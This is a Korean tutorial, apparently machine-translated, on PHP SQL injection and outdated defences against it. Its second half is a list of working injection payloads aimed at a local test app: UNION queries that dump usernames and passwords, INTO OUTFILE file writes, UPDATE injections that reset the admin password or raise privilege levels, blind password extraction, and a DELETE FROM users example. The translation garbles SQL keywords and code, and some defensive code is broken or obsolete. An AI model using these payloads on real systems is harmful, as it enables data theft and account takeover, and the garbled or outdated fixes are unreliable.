PHP SQL 주입 공격 및 예방 조치

// 가정된 입력
$name = "ilia'; DELETE FROM users;"
mysql_query("SELECT * FROM users WHERE name='{ $name}'");

분명히 데이터베이스에서 실행되는 마지막 명령은 다음과 같습니다.

SELECT * FROM users WHERE name=ilia; DELETE FROM users

이는 데이터베이스에 재앙적인 결과를 가져왔습니다. 모든 기록이 삭제되었습니다.

하지만 사용 중인 데이터베이스가 MySQL이라면 다행히 mysql_query() 함수를 사용하면 이러한 작업을 직접 수행할 수 없으므로(한 줄에 여러 문 작업을 수행할 수 없음) 안심하셔도 됩니다. 사용된 데이터베이스가 SQLite 또는 PostgreSQL이고 그러한 명령문을 지원하는 경우 재난에 직면하게 됩니다.

위에서 언급했듯이 SQL 인젝션은 주로 공격 목적을 달성하기 위해 안전하지 않은 데이터를 데이터베이스에 제출합니다. SQL 주입 공격을 방지하기 위해 PHP에는 입력 문자열을 처리하고 하위 수준에서 입력에 대해 사전 보안 처리를 수행할 수 있는 기능, 즉 Magic Quotes가 제공됩니다. (php.ini Magic_quotes_gpc). Magic_quotes_gpc 옵션이 활성화되면 입력 문자열의 작은따옴표, 큰따옴표 및 기타 문자 앞에 자동으로 백슬래시가 붙습니다.

그러나 Magic Quotes는 매우 보편적인 솔루션이 아니며 잠재적으로 위험한 모든 캐릭터를 차단하지 않으며 Magic Quotes가 많은 서버에서 활성화되지 않습니다. 따라서 SQL 인젝션을 방지하기 위해서는 다른 다양한 방법도 활용해야 합니다.

많은 데이터베이스가 기본적으로 이러한 입력 데이터 처리 기능을 제공합니다. 예를 들어, PHP의 MySQL 연산 함수에는 mysql_real_escape_string()이라는 함수가 있는데, 이는 특수 문자나 데이터베이스 연산 오류를 일으킬 수 있는 문자를 이스케이프할 수 있습니다. 이 코드는:

//Magic Quotes 기능이 활성화된 경우
if (get_magic_quotes_gpc()) {
$name = Stripslashes ( $name);
}else{
$name = mysql_real_escape_string($name)
}
mysql_query("SELECT * FROM users WHERE name=' { $name}'");

에서 제공하는 기능을 사용하기 전에 Magic Quotes를 판단해야 합니다. 데이터베이스를 오픈할지 여부는 위의 예와 같이, 그렇지 않으면 프로세스가 두 번 반복되면 오류가 발생합니다. MQ가 활성화된 경우 실제 데이터를 얻으려면 추가된 항목을 제거해야 합니다.

위의 문자열 형식 데이터를 전처리하는 것 외에도 Binary 데이터를 데이터베이스에 저장할 때 전처리에도 주의해야 합니다. 그렇지 않으면 데이터가 데이터베이스 자체의 저장 형식과 충돌하여 데이터베이스가 충돌하거나 데이터 레코드가 손실되거나 전체 데이터베이스가 손실될 수도 있습니다. PostgreSQL과 같은 일부 데이터베이스는 Base64와 유사한 데이터를 인코딩할 수 있는 바이너리 데이터를 인코딩하는 데 특별히 사용되는 pg_escape_bytea() 함수를 제공합니다.

예:

// 일반 텍스트 데이터 사용의 경우:
pg_escape_string($regular_strings);
// 바이너리 데이터 사용:
pg_escape_bytea($binary_data);

다른 경우에도 이러한 메커니즘을 사용해야 합니다. 즉, 데이터베이스 시스템 자체에서 지원하지 않는 중국어, 일본어 등의 멀티바이트 언어입니다. 그 중 일부에는 이진 데이터 범위와 겹치는 ASCII 범위가 있습니다.

여기서는 PHP SQL 주입 방지에 관한 두 가지 기사를 추천합니다. 하나는 360 Security에서 제공하는 것이고, 다른 하나는 저자가 수집한 PHP SQL 주입 방지 코드입니다. 매우 강력하고 사용하기 쉽습니다.

• php 안티 SQL 인젝션 코드(360에서 제공)
• SQL 인젝션 취약점 필터링 기능을 방지하는 PHP 코드

그러나 데이터를 인코딩하면 LIKE abc%와 같은 쿼리 문이 실패할 수 있습니다.

php sql 주입 구현(테스트 코드는 안전합니다)

SQL 주입의 초점은 SQL을 유연하게 사용하여 SQL 문을 구성하는 것입니다. 새로운 주입 문자열을 구성하는 명령문입니다. 공부한 후에는 몇 가지 메모를 작성하여 언제든지 사용할 수 있도록 준비했습니다. 다음 내용을 먼저 읽어보시길 바랍니다 SQL의 기본 원리를 이해합니다. 메모의 코드는 인터넷에서 가져온 것입니다. ===기본부분=== 이 테이블을 쿼리합니다. http://127.0.0.1/injection/user.php?username=angel' 및 LENGTH(비밀번호)='6 http://127.0.0.1/injection/user.php?username=angel' 및 LEFT(password,1)='m

노조 성명: http://127.0.0.1/injection/show.php?id=1' 사용자/*에서 1, 사용자 이름, 비밀번호를 선택하세요. http://127.0.0.1/injection/show.php?id=' 유니온 선택 1,사용자 이름,사용자의 비밀번호/*

파일 내보내기: http://127.0.0.1/injection/user.php?username=angel'을 outfile 'c:/file.txt로 http://127.0.0.1/injection/user.php?username=' 또는 1=1 outfile 'c:/file.txt http://127.0.0.1/injection/show.php?id=' 유니온 선택 1, 사용자 이름, 사용자의 비밀번호를 outfile 'c:/user.txt

INSERT 문: INSERT INTO `user` (사용자 ID, 사용자 이름, 비밀번호, 홈페이지, 사용자 수준) VALUES ('', '$username', '$password', '$homepage', '1'); 홈페이지 값 구성 : http://jbxue.com', '3')# SQL 문은 다음과 같습니다: INSERT INTO `user` (userid, 사용자 이름, 비밀번호, 홈페이지, userlevel) VALUES ('', 'angel', 'mypass', 'http://jbxue.com', '3')#' , '1');

UPDATE 설명: 이 점이 마음에 듭니다. 먼저 이 SQL을 이해하세요.

사용자 설정 비밀번호 업데이트='MD5($password)', 홈페이지='$homepage' WHERE id='$id'

이 SQL을 다음과 같은 형태로 수정하면 인젝션이 이루어진다. 1: 홈페이지 값을 다음으로 수정합니다. http://jbxue.com', userlevel='3 그러면 SQL 문은 다음과 같습니다.

사용자 설정 업데이트 비밀번호='mypass', 홈페이지='http://jbxue.com', userlevel='3' WHERE id='$id '

userlevel은 사용자 수준입니다. 2: 비밀번호 값을 다음으로 수정합니다.

mypass)' WHERE 사용자 이름='admin'#

SQL 이후 진술은

사용자 설정 비밀번호 업데이트='MD5(mypass)' WHERE 사용자 이름='admin'#)', 홈페이지='$homepage' WHERE id='$ id'

3: id 값을 다음으로 수정합니다. ' 또는 사용자 이름='admin' 그러면 SQL 문은 다음과 같습니다.

사용자 설정 비밀번호 업데이트='MD5($password)', 홈페이지='$homepage' WHERE id='' OR 사용자 이름='admin'

===고급 섹션=== 일반적으로 사용되는 MySQL 내장 함수 데이터 베이스() 사용자() 시스템_사용자() 세션_사용자() CURRENT_USER() 데이터 베이스() 버전() 하위 문자열() 중간() 숯() 로드_파일() … 기능적용 업데이트 기사 SET title=DATABASE() WHERE id=1 http://127.0.0.1/injection/show.php?id=-1 통합 선택 1,데이터베이스(),버전()

# Char(97,110,103,101,108)는 Bleak >
과 동일합니다. 코드 복사


http://127.0.0.1/injection/user.php?userid=1 및 비밀번호=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 및 LEFT(비밀번호 ,1)>문자(100)
http://127.0.0.1/injection/user.php?userid=1 및 ord(mid(password,3,1))>111
데이터 구조의 필드 수와 유형 결정
http://127.0.0.1/injection/show.php?id=-1 유니온 선택 1,1,1
http://127.0.0.1/injection/show.php?id=-1 통합 선택 char(97),char(97),char(97)
데이터 테이블 이름 추측하기
http://127.0.0.1/injection/show.php?id=-1 조합원 중에서 1,1,1 선택
사용자 이름과 비밀번호를 얻기 위한 교차 테이블 쿼리
http://127.0.0.1/ymdown/show.php?id=10000 통합 선택 1,사용자 이름,1,비밀번호,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1 from ymdown_user 여기서 ID=1
기타
#첫 번째 비밀번호를 확인하세요
http://127.0.0.1/ymdown/show.php?id=10 통합 선택 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1 from ymdown_user 여기서 id=1 및 ord(mid(password,1,1))=49
===주사방지===
서버측면
Magic_quotes_gpc가 켜짐으로 설정되었습니다.
display_errors가 꺼짐으로 설정되었습니다.
코딩 측면
 
$keywords = addlashes($keywords);
$keywords = str_replace("_","_",$keywords)
 $keywords = str_replace("%","%",$keywords)

숫자 유형
intval()을 사용하여 잡아서 바꾸기
문자열 유형
SQL 문 매개변수에 작은따옴표 추가
주입을 방지하기 위해 다음 코드가 사용됩니다.
 
if (get_magic_quotes_gpc()) {
//....
}else{
$str = mysql_real_escape_string($str );
$keywords = str_replace("_","_",$keywords)
$keywords = str_replace("%","%",$keywords)
}
유용한 기능
스트립슬래시()
get_magic_quotes_gpc()
mysql_real_escape_string()
스트립_태그()
배열_맵()
속눈썹 추가()